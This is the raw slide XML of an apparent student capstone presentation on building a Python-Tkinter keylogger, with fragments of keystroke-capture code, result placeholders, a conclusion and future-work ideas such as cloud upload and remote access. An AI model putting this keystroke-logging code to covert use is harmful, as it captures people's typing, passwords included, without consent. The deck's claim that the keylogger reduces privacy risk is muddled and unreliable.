                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>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chemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Sixth Outline Level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>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chemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Seventh Outline Level</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>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63"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8"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89"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90"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pic>
        <p:nvPicPr>
          <p:cNvPr id="91"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92" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="23"/>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IN" sz="900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="24"/>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94" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="25"/>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69D9A354-E85B-4EAF-B0DA-BC7B28AB1E68}" type="slidenum">
              <a:rPr b="0" lang="en-US" sz="900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-IN"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Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/techtrainer20/TNSDC" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout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1359000" y="1821600"/>
            <a:ext cx="9143640" cy="977400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" rIns="91440" tIns="45720" bIns="45720" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-1" strike="noStrike" cap="all">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>keyloggers</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117" name="TextBox 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-329760" y="1034280"/>
            <a:ext cx="12726360" cy="578880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>CAPSTONE PROJECT</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-IN" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118" name="TextBox 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3117600" y="4586400"/>
            <a:ext cx="7979760" cy="700920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Presented By:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-IN" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>1. Drinitta Sherin D -Dmi College of Engineering-CSE</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rmAutofit fontScale="74983" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4400" spc="-1" strike="noStrike" cap="all">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Franklin Gothic Demi"/>
              </a:rPr>
              <a:t>Algorithm &amp; Deployment</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="296640" y="-426960"/>
            <a:ext cx="11029320" cy="4672800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" rIns="91440" tIns="45720" bIns="45720" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-IN" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>1.Import the necessary libraries:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="340"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1700" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142" name="TextBox 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3535560" y="1640880"/>
            <a:ext cx="5608080" cy="47530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IN" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t># Define the start_keylogger function</a:t>
            </a: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def start_keylogger():</a:t>
            </a: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    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>global listener</a:t>
            </a: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    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>listener = keyboard.Listener(on_press=on_press, on_release=on_release)</a:t>
            </a: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    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>listener.start()</a:t>
            </a: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    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>label.config(text="[+] Keylogger is running!\n[!] Saving the keys in 'keylogger.txt'")</a:t>
            </a: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    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>start_button.config(state='disabled')</a:t>
            </a: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    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>stop_button.config(state='normal')</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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 Define the stop_keylogger function</a:t>
            </a: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def stop_keylogger():</a:t>
            </a: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    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>global listener</a:t>
            </a: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    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>listener.stop()</a:t>
            </a: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    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>label.config(text="Keylogger stopped.")</a:t>
            </a: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    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>start_button</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rmAutofit fontScale="74983" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4400" spc="-1" strike="noStrike" cap="all">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Franklin Gothic Demi"/>
              </a:rPr>
              <a:t>Result</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="144" name="Content Placeholder 3" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1384560" y="1719000"/>
            <a:ext cx="2990880" cy="341964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rmAutofit fontScale="74983" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4400" spc="-1" strike="noStrike" cap="all">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Franklin Gothic Demi"/>
              </a:rPr>
              <a:t>Result</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="146" name="Content Placeholder 3" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="904320" y="1692720"/>
            <a:ext cx="7487280" cy="752400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="147" name="Picture 6" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="720720" y="3458160"/>
            <a:ext cx="11250000" cy="156312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rmAutofit fontScale="74983" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4400" spc="-1" strike="noStrike" cap="all">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Franklin Gothic Demi"/>
              </a:rPr>
              <a:t>Conclusion</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="670680" y="1447200"/>
            <a:ext cx="11029320" cy="4672800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" rIns="91440" tIns="45720" bIns="45720" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="305280" indent="-305280" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1191"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="992"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1cade4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>In conclusion, the creation of our advanced Python-Tkinter based keylogger marks a substantial stride in combating cybersecurity risks linked with keystroke logging. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="305280" indent="-305280" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1191"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="992"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1cade4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>With its fortified security measures and intuitive interface, our keylogger stands poised to furnish users with a dependable and efficient tool for monitoring and safeguarding keyboard activity. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="305280" indent="-305280" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1191"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="992"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1cade4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>By doing so, it effectively minimizes the likelihood of unauthorized access and privacy infringements, bolstering overall cybersecurity defenses.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="18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p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="540000" y="1620000"/>
            <a:ext cx="11029320" cy="4672800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" rIns="91440" tIns="45720" bIns="45720" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="306000" indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="340"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="306000" indent="-306000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1191"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="992"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1cade4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Franklin Gothic Demi"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Integration with cloud-based storage solutions for secure data backup and remote access.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="306000" indent="-306000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1191"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="992"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1cade4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Franklin Gothic Demi"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Implementation of machine learning algorithms for anomaly detection and predictive analytics.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="306000" indent="-306000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1191"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="992"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1cade4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Franklin Gothic Demi"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Collaboration with cybersecurity experts and industry stakeholders to continuously improve and adapt the keylogger's capabilities to evolving threats.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="306000" indent="-306000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1191"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="992"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1cade4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Franklin Gothic Demi"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Expansion of platform support to include mobile devices and IoT (Internet of Things) devices.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="306000" indent="-306000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1191"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="992"/>
              </a:spcAft>
              <a:buClr>
